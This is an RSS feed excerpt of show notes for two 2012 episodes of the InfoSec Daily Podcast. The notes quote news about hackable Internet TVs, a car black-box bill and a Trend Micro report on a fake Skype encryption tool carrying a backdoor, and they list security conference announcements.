<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week you may have read a headline that blared &quot;</span><a href="http://latimesblogs.latimes.com/entertainmentnewsbuzz/2012/03/100-million-tvs-will-be-internet-connected-by-2016.html"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">100 million TVs will be Web-connected by 2016</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.&quot; Will Internet TVs will be hacked as successfully as previous generations of digital devices?</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course they will!</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nothing in a computer built into a TV makes it less attackable than a PC. Internet-connected TVs have IP addresses, always-on network interfaces, CPUs, storage, memory, and operating systems &#8212; the details that have offered hackers a bounty of attack choices for the last three decades.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Can we make Internet TVs more secure than regular computers? Yes. Will we? Probably not. We never do the right things proactively. Instead, we as a global society appear inclined to accept half-baked security solutions that are more like Band-Aids than real protection.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.infowars.com/mandatory-big-brother-black-boxes-in-all-new-cars-from-2015/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infowars.com/mandatory-big-brother-black-boxes-in-all-new-cars-from-2015/</span></a></p>
<p><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bill already passed by the Senate and set to be rubber stamped by the House would make it mandatory for all new cars in the United States to be fitted with black box data recorders from 2015 onwards.</span></p>
<p>	<a href="http://www.govtrack.us/congress/bills/112/s1813/text"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Section 31406 of Senate Bill 1813</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (known as MAP-21), calls for &ldquo;Mandatory Event Data Recorders&rdquo; to be installed in all new automobiles and legislates for civil penalties to be imposed against individuals for failing to do so.</span></p>
<p>	<span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Not later than 180 days after the date of enactment of this Act, the Secretary shall revise part 563 of title 49, Code of Federal Regulations, to require, beginning with model year 2015, that new passenger motor vehicles sold in the United States be equipped with an event data recorder that meets the requirements under that part,&rdquo; states the bill.</span></p>
<p>	<span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although the text of legislation states that such data would remain the property of the owner of the vehicle, the government would have the power to access it in a number of circumstances, including by court order, if the owner consents to make it available, and pursuant to an investigation or inspection conducted by the Secretary of Transportation.</span><br />
	<span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Given the innumerable examples of both government and industry illegally using supposedly privacy-protected information to spy on individuals, this represents the slippery slope to total Big Brother surveillance of every American&rsquo;s transport habits and location data.</span></p>
<p>	<span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The legislation, which has been given the Orwellian title &lsquo;Moving Ahead for Progress in the 21st Century Act&rsquo;, sailed through the Senate after being heavily promoted by Democrats Harry Reid and Barbara Boxer and is also expected to pass the Republican-controlled House.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blog.trendmicro.com/fake-skype-encryption-software-cloaks-darkcomet-trojan/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/fake-skype-encryption-software-cloaks-darkcomet-trojan/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://edition.cnn.com/2012/02/17/tech/web/computer-virus-syria/index.html"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://edition.cnn.com/2012/02/17/tech/web/computer-virus-syria/index.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the conflict in Syria persists, the Internet continues to play an interesting role. As we reported in a previous post, there have been targeted attacks against Syrian opposition supporters. With activists&rsquo; continued use of social media, it is not surprising to read reports of targeted phishing attempts to steal</span><a href="https://www.eff.org/deeplinks/2012/03/pro-syrian-government-hackers-target-syrian-activists-facebook-phishing-attack"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Facebook</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and</span><a href="https://www.eff.org/deeplinks/2012/03/fake-youtube-site-targets-syrian-activists-malware"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">YouTube</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> credentials. A CNN</span><a href="http://edition.cnn.com/2012/02/17/tech/web/computer-virus-syria/index.html"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">report</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> also revealed that a malware was being propagated through </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skype</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which brings us to another Skype-themed attack that we have uncovered.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We discovered a webpage that advertises a software that purports to provide encryption for </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skype</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. This page is hosted in Syria on </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">{BLOCKED}encription.sytes.net</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which resolves to </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">{BLOCKED}.{BLOCKED}.0.28</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &ndash; the same server that acted as a command-and-control (C&amp;C) server for previous attacks. The webpage features an embedded </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">YouTube</span><a href="http://www.youtube.com/watch?v=A3cQZD-V1Ns&amp;feature=player_embedded"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">video</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that claims to be from &ldquo;IT Security Lab&rdquo; and to encrypt voice communications.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If users are tricked into downloading the file, a program does appear that is supposed to encrypt users&rsquo; Skype data. The said file, </span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skype Encription v 2.1.exe</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, is detected by Trend Micro as</span><a href="http://about-threats.trendmicro.com/Malware.aspx?language=us&amp;name=BKDR_METEO.HVN"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">BKDR_METEO.HVN</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. During the analysis, we did not find any evidence that the software actually provides any security properties.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-650-microsoft-intune-sleepy-pilot-is-java-free-tv-hacking-big-brother-for-cars-and-skype-virus/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3799/0/infosec-daily-podcast-episode-650.mp3" length="64680524" type="audio/mpeg" />
		<itunes:duration>0:44:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 650 for April 20, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad and Karthik Rangarajan.
&#160;
Announcements
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	h[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 650 for April 20, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad and Karthik Rangarajan.
&#160;
Announcements
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please Help these two sibling dogs stay alive
You won&#39;t even believe this story or this absolutely beautiful dog relationship. Just check out the photos below. My heart is breaking. A pit bull and chihuahua -both just 6 years old &#8211; have given their entire lives to taking care of their human owners. Now the owners have had a second baby last week &#8211; and they want both of their dogs to be KILLED IMMEDIATELY because they &#34;don&#39;t have time for them anymore&#34;. They want nothing to do with their poor animals, and have given a person in our group, Sloane, just a few more days to find a foster or permanent home for them. They plan to have the dogs euthanized this weekend. Sloane has been trying to find a foster home for both of them, to keep them together. But the owners said that they don&#39;t care if the dogs are split up &#8211; they just want them gone from their house or dead. Please, if there was ever a time when maybe you could help foster a dog, THIS IS THE TIME!! The chihuahua is so teeny tiny that he is barely an extra inconvenience at all. And these dogs are so bonded, that they will take care of each other and keep each other company. The pit bull is named Dozer and the chiuahahua is named Biggie. They are being kicked out of the only home they have ever known. This experience will be so traumatic for them, especially if they are split up. If any of you have ever volunteered or worked at a shelter, or were around when people were dropping off their dogs to the shelter, you know how horrifying it is to watch a dog be ripped from the life they knew, and thrown into a cage, in a room full of other crying and screaming animals. Great with KIDS and CATS!! Both dogs are apparently great around kids and the owner said that her nieces and nephews hang all over the dogs all of the time, and the dogs are wonderful with them. No aggression AT ALL. Owners used to have 3 cats several years ago, and dogs got along perfectly fine with the cats at that time. They are also good when they see other dogs on the street, but haven&#39;t been given many opportunities to play or socialize. They would of course need to be tested with other dogs/cats, if you have a dog or cat. But it sounds like it is likely there would not be an issue.
CONTACT IMMEDIATELY: Sloane 917-648-9808 bslnews2011@gmail.com
&#160;
[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 649 &#8211; AnonPaste, CEE, Emory Healthcare, Saturday’s Targets, Hacker Way and Tardy Be-Gone</title>
		<link>http://www.isdpodcast.com/episode-649-anonpaste-cee-emory-healthcare-saturdays-targets-hacker-way-and-tardy-be-gone</link>
		<comments>http://www.isdpodcast.com/episode-649-anonpaste-cee-emory-healthcare-saturdays-targets-hacker-way-and-tardy-be-gone#comments</comments>
		<pubDate>Fri, 20 Apr 2012 00:49:19 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3792</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 649 for April 19, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw and Karthik Rangarajan. &#160; Announcements Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 649 for April 19, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
